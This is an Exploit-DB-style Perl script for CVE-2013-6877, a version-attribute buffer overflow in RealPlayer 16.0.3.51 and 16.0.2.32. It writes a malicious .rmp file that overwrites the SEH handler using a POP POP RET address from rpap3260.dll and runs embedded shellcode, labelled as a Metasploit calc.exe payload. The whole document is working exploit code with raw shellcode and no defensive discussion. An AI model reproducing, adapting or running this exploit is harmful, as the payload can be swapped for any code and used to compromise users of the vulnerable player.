#!/usr/bin/perl #-----------------------------------------------------------------------------# # Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow # # Date: Dec 20, 2013 # # Exploit Author: Gabor Seljan # # Vendor Homepage: http://www.real.com # # Software Link: http://www.oldapps.com/real.php?old_real_player=12814 # # Version: 16.0.3.51 and 16.0.2.32 # # Tested on: Windows XP SP2/SP3 (NX) # # CVE: CVE-2013-6877 # #-----------------------------------------------------------------------------# use strict; use warnings; my $filename = "sploit.rmp"; my $open = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"; my $close = "\x22\x3f\x3e\x3b"; my $junk1 = "\x41" x 2540; # Offset to SEH when opening via click my $junk2 = "\x41" x 10514; # Offset to SEH when opening via menu my $nSEH = "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes) my $SEH = pack('V',0x641930c8); # POP POP RET from rpap3260.dll (16.0.3.51) #my $SEH = pack('V',0x63A630B8); # POP POP RET from rpap3260.dll (16.0.2.32) my $junk3 = "\x41" x 17000; # Generate exception # msfpayload windows/exec CMD=calc.exe my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1". "\x33\x83\xea\xfc\x31\x42\x0e\x03\x6d\x90\x4b\x9a\x8d\x44\x02\x65\x6d\x95\x75". "\xef\x88\xa4\xa7\x8b\xd9\x95\x77\xdf\x8f\x15\xf3\x8d\x3b\xad\x71\x1a\x4c\x06". "\x3f\x7c\x63\x97\xf1\x40\x2f\x5b\x93\x3c\x2d\x88\x73\x7c\xfe\xdd\x72\xb9\xe2". "\x2e\x26\x12\x69\x9c\xd7\x17\x2f\x1d\xd9\xf7\x24\x1d\xa1\x72\xfa\xea\x1b\x7c". "\x2a\x42\x17\x36\xd2\xe8\x7f\xe7\xe3\x3d\x9c\xdb\xaa\x4a\x57\xaf\x2d\x9b\xa9". "\x50\x1c\xe3\x66\x6f\x91\xee\x77\xb7\x15\x11\x02\xc3\x66\xac\x15\x10\x15\x6a". "\x93\x85\xbd\xf9\x03\x6e\x3c\x2d\xd5\xe5\x32\x9a\x91\xa2\x56\x1d\x75\xd9\x62". "\x96\x78\x0e\xe3\xec\x5e\x8a\xa8\xb7\xff\x8b\x14\x19\xff\xcc\xf0\xc6\xa5\x87". "\x12\x12\xdf\xc5\x78\xe5\x6d\x70\xc5\xe5\x6d\x7b\x65\x8e\x5c\xf0\xea\xc9\x60". "\xd3\x4f\x25\x2b\x7e\xf9\xae\xf2\xea\xb8\xb2\x04\xc1\xfe\xca\x86\xe0\x7e\x29". "\x96\x80\x7b\x75\x10\x78\xf1\xe6\xf5\x7e\xa6\x07\xdc\x1c\x29\x94\xbc\xcc\xcc". "\x1c\x26\x11\x7f\x72\x75\x0a\xf5\x98\x79\x2f\xb1\x76\x30\xe0\x3f\x49\x74\x0d". "\x93\x42\x0c\xbf\x92\xb8\x4e\xba\x4a\xbe\x99\x71\x09\xf8\x14\xa9\x96\x91\x7e". "\x7c\x77\x27\x25\x7b\x38\xd6\x9b\x33\xd5\xb5\x31\xe1\x66\xb7\xb4\x80\xd2\xfd". "\x2d\xb6\x24\x43\x67\x90\xb2\xbb\x47\x40\x73\x3c\x3d\x97\x1c\x29\xd0\xf9\x70". "\x4b\x78\x35\x9f\x4f\x2c\xb3\x7a\x05\x87\xf6\xd3\xeb\x48\xb0\x89\xf7\xe2\x41". "\x1d\x8d\xb9\x15\x04\x2b\xfc\xa8\x3a\xd4\x37\x7d\x19\xf8\x7e\x08\xeb\x21\xe1". "\x7b\x71\x75\x05\x3f\xbb\x66\x0c\x93\x3c\x8d\x98\x69\xf9\x7c\x27\x70\x48\x23". "\xd4\x84\xf5\xbe\x72\x4e\xa8\x9b\x73\x25\x41\x81\xe0\x04\x40\x78\x79\x43\x37". "\x7f\x2c\x96\xb9\xbf\x74\x77\x1d\x0d\x20\xfc\xb4\x91\xa9\xb8\x97\x4b\x18\xe3". "\x49\x7d\x76\x3d\x47\xba\xb5\x14\x99\xb1\x24\x83\xe2\x10\xfd\x67\x7a\x4f\x35". "\x9f\xb6\xb3\x7d\x75\x32\xe2\x4a\x86\xd5\xb2\xb7\xb0\x77\x11\xe0\x12\xd1\xeb". "\x1c\x90\x7f\x42\x7c\x2d\x92\x72\x2f\x7a\x13\xc0\xd6\x76\x15\x99\x70\x14\x8d". "\x4e\xbe\x96\xb7\x85\xff\xc1\xe1\x2d\xb0\x71\x1b\xd5\x1d\x02\xe3\x04\x7b\x05". "\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d". "\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78". "\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c". "\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; my $evil = $nSEH.$SEH.$shellcode; my $sploit = $open.$junk1.$evil.$junk2.$evil.$junk3.$close; open(FILE, ">$filename") || die "[-]Error:\n$!\n"; print FILE $sploit; close(FILE); print "Exploit file created successfully [$filename]!\n";